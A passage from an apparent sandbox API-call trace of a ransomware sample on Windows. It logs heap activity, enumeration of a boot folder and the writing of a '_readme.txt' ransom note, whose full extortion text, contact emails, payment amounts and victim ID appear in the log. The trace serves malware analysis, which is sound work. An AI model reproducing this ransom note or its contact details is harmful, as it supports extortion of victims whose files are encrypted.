hHeap=0x2c0000) returned 1 [0180.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.224] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0180.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.224] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.224] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.224] PathFindFileNameW (pszPath="") returned="" [0180.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.224] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.225] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.225] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.225] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.225] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0180.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.225] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0180.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.226] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.226] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.227] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.228] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*" (normalized: "c:\\boot\\ko-kr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.229] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.229] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.229] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.229] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.230] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.252] HeapFree 